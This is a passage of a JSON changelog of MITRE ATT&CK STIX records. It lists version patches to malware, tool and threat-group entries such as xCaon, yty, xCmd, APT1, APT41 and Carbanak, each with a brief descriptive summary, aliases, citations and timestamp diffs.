\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:24.383000+00:00\", \"old_value\": \"2025-04-16 20:38:54.328000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--21583311-6321-4891-8a37-3eb4e57b0fb1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-29 00:04:26.906000+00:00", + "modified": "2025-04-25 14:42:49.417000+00:00", + "name": "xCaon", + "description": "[xCaon](https://attack.mitre.org/software/S0653) is an HTTP variant of the [BoxCaon](https://attack.mitre.org/software/S0651) malware family that has used by [IndigoZebra](https://attack.mitre.org/groups/G0136) since at least 2014. [xCaon](https://attack.mitre.org/software/S0653) has been used to target political entities in Central Asia, including Kyrgyzstan and Uzbekistan.(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0653", + "external_id": "S0653" + }, + { + "source_name": "xCaon", + "description": "(Citation: Checkpoint IndigoZebra July 2021)" + }, + { + "source_name": "Checkpoint IndigoZebra July 2021", + "description": "CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.", + "url": "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/" + }, + { + "source_name": "Securelist APT Trends Q2 2017", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2017, August 8). APT Trends report Q2 2017. Retrieved February 15, 2018.", + "url": "https://securelist.com/apt-trends-report-q2-2017/79332/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "xCaon" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Pooja Natarajan, NEC Corporation India", + "Yoshihiro Kori, NEC Corporation", + "Manikantan Srinivasan, NEC Corporation India" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:49.417000+00:00\", \"old_value\": \"2025-04-16 20:37:58.030000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:11.941000+00:00", + "modified": "2025-04-25 14:45:18.852000+00:00", + "name": "xCmd", + "description": "[xCmd](https://attack.mitre.org/software/S0123) is an open source tool that is similar to [PsExec](https://attack.mitre.org/software/S0029) and allows the user to execute applications on remote systems. (Citation: xCmd)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0123", + "external_id": "S0123" + }, + { + "source_name": "xCmd", + "description": "Rayaprolu, A.. (2011, April 12). xCmd an Alternative to PsExec. Retrieved August 10, 2016.", + "url": "https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:18.852000+00:00\", \"old_value\": \"2025-04-16 20:38:51.879000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--0817aaf2-afea-4c32-9285-4dcd1df5bf14", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:42:35.950000+00:00", + "name": "yty", + "description": "[yty](https://attack.mitre.org/software/S0248) is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. (Citation: ASERT Donot March 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0248", + "external_id": "S0248" + }, + { + "source_name": "yty", + "description": "(Citation: ASERT Donot March 2018)" + }, + { + "source_name": "ASERT Donot March 2018", + "description": "Schwarz, D., Sopko J. (2018, March 08). Donot Team Leverages New Modular Malware Framework in South Asia. Retrieved June 11, 2018.", + "url": "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "yty" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:35.950000+00:00\", \"old_value\": \"2025-04-16 20:37:53.646000+00:00\"}}}", + "previous_version": "1.2" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "groups": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "intrusion-set", + "id": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-05 18:53:08.166000+00:00", + "modified": "2025-04-25 14:49:32.503000+00:00", + "name": "APT-C-36", + "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) is a suspected South America espionage group that has been active since at least 2018. The group mainly targets Colombian government institutions as well as important corporations in the financial sector, petroleum industry, and professional manufacturing.(Citation: QiAnXin APT-C-36 Feb2019)", + "aliases": [ + "APT-C-36", + "Blind Eagle" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0099", + "external_id": "G0099" + }, + { + "source_name": "Blind Eagle", + "description": "(Citation: QiAnXin APT-C-36 Feb2019)" + }, + { + "source_name": "QiAnXin APT-C-36 Feb2019", + "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020.", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jose Luis S\u00e1nchez Martinez" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:32.503000+00:00\", \"old_value\": \"2025-04-16 20:37:39.643000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:47.955000+00:00", + "modified": "2025-04-25 14:49:20.672000+00:00", + "name": "APT1", + "description": "[APT1](https://attack.mitre.org/groups/G0006) is a Chinese threat group that has been attributed to the 2nd Bureau of the People\u2019s Liberation Army (PLA) General Staff Department\u2019s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. (Citation: Mandiant APT1)", + "aliases": [ + "APT1", + "Comment Crew", + "Comment Group", + "Comment Panda" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0006", + "external_id": "G0006" + }, + { + "source_name": "APT1", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Crew", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Group", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Panda", + "description": "(Citation: CrowdStrike Putter Panda)" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + }, + { + "source_name": "CrowdStrike Putter Panda", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.", + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.4", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:20.672000+00:00\", \"old_value\": \"2025-04-16 20:37:37.426000+00:00\"}}}", + "previous_version": "1.4" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--c47f937f-1022-4f42-8525-e7a4779a14cb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:47.537000+00:00", + "modified": "2025-04-25 14:49:18.305000+00:00", + "name": "APT12", + "description": "[APT12](https://attack.mitre.org/groups/G0005) is a threat group that has been attributed to China. The group has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments.(Citation: Meyers Numbered Panda)", + "aliases": [ + "APT12", + "IXESHE", + "DynCalc", + "Numbered Panda", + "DNSCALC" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0005", + "external_id": "G0005" + }, + { + "source_name": "APT12", + "description": "(Citation: Meyers Numbered Panda) (Citation: Moran 2014)" + }, + { + "source_name": "IXESHE", + "description": "(Citation: Meyers Numbered Panda) (Citation: Moran 2014)" + }, + { + "source_name": "DynCalc", + "description": "(Citation: Meyers Numbered Panda) (Citation: Moran 2014)" + }, + { + "source_name": "Numbered Panda", + "description": "(Citation: Meyers Numbered Panda)" + }, + { + "source_name": "DNSCALC", + "description": "(Citation: Moran 2014)" + }, + { + "source_name": "Meyers Numbered Panda", + "description": "Meyers, A. (2013, March 29). Whois Numbered Panda. Retrieved January 14, 2016.", + "url": "http://www.crowdstrike.com/blog/whois-numbered-panda/" + }, + { + "source_name": "Moran 2014", + "description": "Moran, N., Oppenheim, M., Engle, S., & Wartell, R.. (2014, September 3). Darwin\u2019s Favorite APT Group [Blog]. Retrieved November 12, 2014.", + "url": "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "2.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:18.305000+00:00\", \"old_value\": \"2025-04-16 20:37:37.119000+00:00\"}}}", + "previous_version": "2.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-09-23 13:43:36.945000+00:00", + "modified": "2025-04-22 21:56:33.318000+00:00", + "name": "APT41", + "description": "[APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting various industries, including but not limited to healthcare, telecom, technology, finance, education, retail and video game industries in 14 countries.(Citation: apt41_mandiant) Notable behaviors include using a wide range of malware and tools to complete mission objectives. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)\n", + "aliases": [ + "APT41", + "Wicked Panda", + "Brass Typhoon", + "BARIUM" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0096", + "external_id": "G0096" + }, + { + "source_name": "Wicked Panda", + "description": "(Citation: Crowdstrike GTR2020 Mar 2020)" + }, + { + "source_name": "APT41", + "description": "(Citation: FireEye APT41 2019)" + }, + { + "source_name": "Brass Typhoon", + "description": "(Citation: Microsoft Threat Actor Naming July 2023)" + }, + { + "source_name": "BARIUM", + "description": "(Citation: Microsoft Threat Actor Naming July 2023)" + }, + { + "source_name": "Crowdstrike GTR2020 Mar 2020", + "description": "Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.", + "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" + }, + { + "source_name": "FireEye APT41 2019", + "description": "FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.", + "url": "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf" + }, + { + "source_name": "FireEye APT41 Aug 2019", + "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.", + "url": "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf" + }, + { + "source_name": "apt41_mandiant", + "description": "Mandiant. (n.d.). APT41, A DUAL ESPIONAGE AND CYBER CRIME OPERATION. Retrieved June 11, 2024.", + "url": "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf" + }, + { + "source_name": "Microsoft Threat Actor Naming July 2023", + "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.", + "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide" + }, + { + "source_name": "Group IB APT 41 June 2021", + "description": "Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.", + "url": "https://www.group-ib.com/blog/colunmtk-apt41/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet", + "Nikita Rostovcev, Group-IB" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "4.1", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-22 21:56:33.318000+00:00\", \"old_value\": \"2024-10-10 14:31:35.326000+00:00\"}}}", + "previous_version": "4.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:48:57.719000+00:00", + "name": "BRONZE BUTLER", + "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)", + "aliases": [ + "BRONZE BUTLER", + "REDBALDKNIGHT", + "Tick" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0060", + "external_id": "G0060" + }, + { + "source_name": "BRONZE BUTLER", + "description": "(Citation: Trend Micro Daserf Nov 2017)(Citation: Trend Micro Tick November 2019)" + }, + { + "source_name": "REDBALDKNIGHT", + "description": "(Citation: Trend Micro Daserf Nov 2017)(Citation: Trend Micro Tick November 2019)" + }, + { + "source_name": "Tick", + "description": "(Citation: Trend Micro Daserf Nov 2017)(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)" + }, + { + "source_name": "Trend Micro Daserf Nov 2017", + "description": "Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER\u2019s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" + }, + { + "source_name": "Secureworks BRONZE BUTLER Oct 2017", + "description": "Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.", + "url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + }, + { + "source_name": "Trend Micro Tick November 2019", + "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.", + "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf" + }, + { + "source_name": "Symantec Tick Apr 2016", + "description": "DiMaggio, J. (2016, April 28). Tick cyberespionage group zeros in on Japan. Retrieved July 16, 2018.", + "url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Trend Micro Incorporated" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:57.719000+00:00\", \"old_value\": \"2025-04-16 20:37:34.368000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--9735c036-8ebe-47e9-9c77-b0ae656dab93", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-21 14:52:49.596000+00:00", + "modified": "2025-04-25 14:48:58.613000+00:00", + "name": "BackdoorDiplomacy", + "description": "[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) is a cyber espionage threat group that has been active since at least 2017. [BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has targeted Ministries of Foreign Affairs and telecommunication companies in Africa, Europe, the Middle East, and Asia.(Citation: ESET BackdoorDiplomacy Jun 2021)", + "aliases": [ + "BackdoorDiplomacy" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0135", + "external_id": "G0135" + }, + { + "source_name": "ESET BackdoorDiplomacy Jun 2021", + "description": "Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021", + "url": "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Zaw Min Htun, @Z3TAE" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:58.613000+00:00\", \"old_value\": \"2025-04-16 20:37:34.519000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--da49b9f1-ca99-443f-9728-0a074db66850", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:49:40.224000+00:00", + "name": "BlackOasis", + "description": "[BlackOasis](https://attack.mitre.org/groups/G0063) is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. (Citation: Securelist BlackOasis Oct 2017) (Citation: Securelist APT Trends Q2 2017) A group known by Microsoft as [NEODYMIUM](https://attack.mitre.org/groups/G0055) is reportedly associated closely with [BlackOasis](https://attack.mitre.org/groups/G0063) operations, but evidence that the group names are aliases has not been identified. (Citation: CyberScoop BlackOasis Oct 2017)", + "aliases": [ + "BlackOasis" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0063", + "external_id": "G0063" + }, + { + "source_name": "BlackOasis", + "description": "(Citation: Securelist BlackOasis Oct 2017) (Citation: Securelist APT Trends Q2 2017)" + }, + { + "source_name": "Securelist BlackOasis Oct 2017", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2017, October 16). BlackOasis APT and new targeted attacks leveraging zero-day exploit. Retrieved February 15, 2018.", + "url": "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/" + }, + { + "source_name": "Securelist APT Trends Q2 2017", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2017, August 8). APT Trends report Q2 2017. Retrieved February 15, 2018.", + "url": "https://securelist.com/apt-trends-report-q2-2017/79332/" + }, + { + "source_name": "CyberScoop BlackOasis Oct 2017", + "description": "Bing, C. (2017, October 16). Middle Eastern hacking group is using FinFisher malware to conduct international espionage. Retrieved February 15, 2018.", + "url": "https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:40.224000+00:00\", \"old_value\": \"2025-04-16 20:37:41.036000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-05 18:36:45.970000+00:00", + "modified": "2025-04-25 19:03:07.787000+00:00", + "name": "BlackTech", + "description": "[BlackTech](https://attack.mitre.org/groups/G0098) is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia--particularly Taiwan, Japan, and Hong Kong--and the US since at least 2013. [BlackTech](https://attack.mitre.org/groups/G0098) has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.(Citation: TrendMicro BlackTech June 2017)(Citation: Symantec Palmerworm Sep 2020)(Citation: Reuters Taiwan BlackTech August 2020)", + "aliases": [ + "BlackTech", + "Palmerworm" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0098", + "external_id": "G0098" + }, + { + "source_name": "Palmerworm", + "description": "(Citation: Symantec Palmerworm Sep 2020)(Citation: IronNet BlackTech Oct 2021)" + }, + { + "source_name": "TrendMicro BlackTech June 2017", + "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/" + }, + { + "source_name": "IronNet BlackTech Oct 2021", + "description": "Demboski, M., et al. (2021, October 26). China cyber attacks: the current threat landscape. Retrieved March 25, 2022.", + "url": "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape" + }, + { + "source_name": "Reuters Taiwan BlackTech August 2020", + "description": "Lee, Y. (2020, August 19). Taiwan says China behind cyberattacks on government agencies, emails. Retrieved April 6, 2022.", + "url": "https://www.reuters.com/article/us-taiwan-cyber-china/taiwan-says-china-behind-cyberattacks-on-government-agencies-emails-idUSKCN25F0JK" + }, + { + "source_name": "Symantec Palmerworm Sep 2020", + "description": "Threat Intelligence. (2020, September 29). Palmerworm: Espionage Gang Targets the Media, Finance, and Other Sectors. Retrieved March 25, 2022.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Tatsuya Daitoku, Cyber Defense Institute, Inc.", + "Hannah S" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "2.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 19:03:07.787000+00:00\", \"old_value\": \"2025-04-16 20:37:33.408000+00:00\"}, \"root['x_mitre_contributors'][1]\": {\"new_value\": \"Hannah S\", \"old_value\": \"Hannah Simes, BT Security\"}}}", + "previous_version": "2.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--55033a4d-3ffe-46b2-99b4-2c1541e9ce1c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:49.021000+00:00", + "modified": "2025-04-25 14:49:30.378000+00:00", + "name": "Carbanak", + "description": "[Carbanak](https://attack.mitre.org/groups/G0008) is a cybercriminal group that has used [Carbanak](https://attack.mitre.org/software/S0030) malware to target financial institutions since at least 2013. [Carbanak](https://attack.mitre.org/groups/G0008) may be linked to groups tracked separately as [Cobalt Group](https://attack.mitre.org/groups/G0080) and [FIN7](https://attack.mitre.org/groups/G0046) that have also used [Carbanak](https://attack.mitre.org/software/S0030) malware.(Citation: Kaspersky Carbanak)(Citation: FireEye FIN7 April 2017)(Citation: Europol Cobalt Mar 2018)(Citation: Secureworks GOLD NIAGARA Threat Profile)(Citation: Secureworks GOLD KINGSWOOD Threat Profile)", + "aliases": [ + "Carbanak", + "Anunak" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0008", + "external_id": "G0008" + }, + { + "source_name": "Carbanak", + "description": "(Citation: Kaspersky Carbanak) (Citation: Fox-It Anunak Feb 2015)" + }, + { + "source_name": "Anunak", + "description": "(Citation: Fox-It Anunak Feb 2015)" + }, + { + "source_name": "Kaspersky Carbanak", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf" + }, + { + "source_name": "FireEye FIN7 April 2017", + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + }, + { + "source_name": "Europol Cobalt Mar 2018", + "description": "Europol. (2018, March 26). Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain. Retrieved October 10, 2018.", + "url": "https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain" + }, + { + "source_name": "Secureworks GOLD NIAGARA Threat Profile", + "description": "CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.", + "url": "https://www.secureworks.com/research/threat-profiles/gold-niagara" + }, + { + "source_name": "Secureworks GOLD KINGSWOOD Threat Profile", + "description": "Secureworks. (n.d.). GOLD KINGSWOOD. Retrieved October 18, 2021.", + "url": 